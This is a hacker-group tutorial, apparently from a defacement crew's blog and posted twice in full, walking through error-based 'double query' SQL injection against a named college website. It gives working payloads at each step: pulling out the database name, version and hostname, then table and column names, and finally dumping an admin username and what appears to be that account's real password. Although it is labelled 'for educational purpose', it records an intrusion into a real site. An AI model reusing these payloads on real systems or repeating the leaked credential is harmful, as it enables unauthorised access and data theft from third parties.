~ Starting with the Name of Almighty ALLAH~
Asalam-u-alaikum
==================================================================
Note: For Educational Purpose
# Double Querry Injection
# http://robotpirates1337.blogspot.com
# Reaper Grim (cb0t) Robot Pirates
# The Game is Not yet Over !
==================================================================
# Target :http://www.ksrmce.ac.in/
# Vuln link: http://www.ksrmce.ac.in/departments/department.php?id=9
# First Lets see Simple Injection i mean Lets Use Order by
# Now Use Union and By Using Union we get this Error
(The used SELECT statements have a different number of columns)
# This means We have to use Double Querry or Heavy Querry injection
# Lets Start
1) First Current database name for this Use this Querry
+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# here "Duplicate entry 'ksrmce_ksrmDB1' for key 'group_key'"
2) Now Version Just Change [database()] to [version()]
# "Duplicate entry '5.1.61-cll1' for key 'group_key'"
Note: You Can get Hostname,Datadirectory by Replacing version() with
this
# Hostname= @@hostname=Duplicate entry 'cpanel23.interactivedns.com1' for key 'group_key'
# Datadirectory= @@datadir=Duplicate entry '/var/lib/mysql/1' for key 'group_key'
3) Now lets see How many tables are in the Database
+and(select 1 FROM(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# "Duplicate entry '~'22'~1' for key 'group_key'" [22 tables]
4)Now lets Get tables from database ;)
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# First Table "Duplicate entry '~'tbl_announcement'~1' for key 'group_key'"
Now Change the Limit just watch Closley change the Limit Where we see
[table_schema=database() LIMIT 2,1] By Changing limits we can get Tables
Note : Sorry i don't have time so I just skip one by one Table
finding
5) Now Lets get Data from Tables
# "tbl_users" Hex it and Follow me ;)
"0x74626c5f7573657273"
+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=database() AND table_name=0x74626c5f7573657273 LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# Column Name = Duplicate entry 'US_ID1' for key 'group_key'[US_ID]
Now Again Change the Limit Where we changed before ^_^
#Duplicate entry 'US_LOGINID1' for key 'group_key'[US_LOGINID]
#Duplicate entry 'US_NAME1' for key 'group_key'[US_NAME]
#Duplicate entry 'US_PASSWORD1' for key 'group_key' [US_PASSWORD]
6) Now the Last Step ;) Get Data from "tbl_users" By Using this
+and+(select 1 FROM(select+count(*),concat((select(us_name) FROM tbl_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
# Username=admin
# UserPass=narayan2bathula1
I hope U guys Learn Something From it ^_^
================================================================
Greetz
~ ~L1nux3rr0r ~ PhpBuGz ~ H4x0rl1f3 ~ Hitcher ~ Shadow008 ~
Special Love to
~ Cfr ~ Dr Ninja ~ Zq@r ~ Cos b0t
All All Rob0t Pirates & Madleets members ;)
./reaper
Asalam-u-alaikum
==================================================================
Note: For Educational Purpose
# Double Querry Injection
# http://robotpirates1337.blogspot.com
# Reaper Grim (cb0t) Robot Pirates
# The Game is Not yet Over !
==================================================================
# Target :http://www.ksrmce.ac.in/
# Vuln link: http://www.ksrmce.ac.in/departments/department.php?id=9
# First Lets see Simple Injection i mean Lets Use Order by
# Now Use Union and By Using Union we get this Error
(The used SELECT statements have a different number of columns)
# This means We have to use Double Querry or Heavy Querry injection
# Lets Start
1) First Current database name for this Use this Querry
+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# here "Duplicate entry 'ksrmce_ksrmDB1' for key 'group_key'"
2) Now Version Just Change [database()] to [version()]
# "Duplicate entry '5.1.61-cll1' for key 'group_key'"
Note: You Can get Hostname,Datadirectory by Replacing version() with
this
# Hostname= @@hostname=Duplicate entry 'cpanel23.interactivedns.com1' for key 'group_key'
# Datadirectory= @@datadir=Duplicate entry '/var/lib/mysql/1' for key 'group_key'
3) Now lets see How many tables are in the Database
+and(select 1 FROM(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# "Duplicate entry '~'22'~1' for key 'group_key'" [22 tables]
4)Now lets Get tables from database ;)
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# First Table "Duplicate entry '~'tbl_announcement'~1' for key 'group_key'"
Now Change the Limit just watch Closley change the Limit Where we see
[table_schema=database() LIMIT 2,1] By Changing limits we can get Tables
Note : Sorry i don't have time so I just skip one by one Table
finding
5) Now Lets get Data from Tables
# "tbl_users" Hex it and Follow me ;)
"0x74626c5f7573657273"
+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=database() AND table_name=0x74626c5f7573657273 LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
# Column Name = Duplicate entry 'US_ID1' for key 'group_key'[US_ID]
Now Again Change the Limit Where we changed before ^_^
#Duplicate entry 'US_LOGINID1' for key 'group_key'[US_LOGINID]
#Duplicate entry 'US_NAME1' for key 'group_key'[US_NAME]
#Duplicate entry 'US_PASSWORD1' for key 'group_key' [US_PASSWORD]
6) Now the Last Step ;) Get Data from "tbl_users" By Using this
+and+(select 1 FROM(select+count(*),concat((select(us_name) FROM tbl_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
# Username=admin
# UserPass=narayan2bathula1
I hope U guys Learn Something From it ^_^
================================================================
Greetz
~ ~L1nux3rr0r ~ PhpBuGz ~ H4x0rl1f3 ~ Hitcher ~ Shadow008 ~
Special Love to
~ Cfr ~ Dr Ninja ~ Zq@r ~ Cos b0t
All All Rob0t Pirates & Madleets members ;)
./reaper
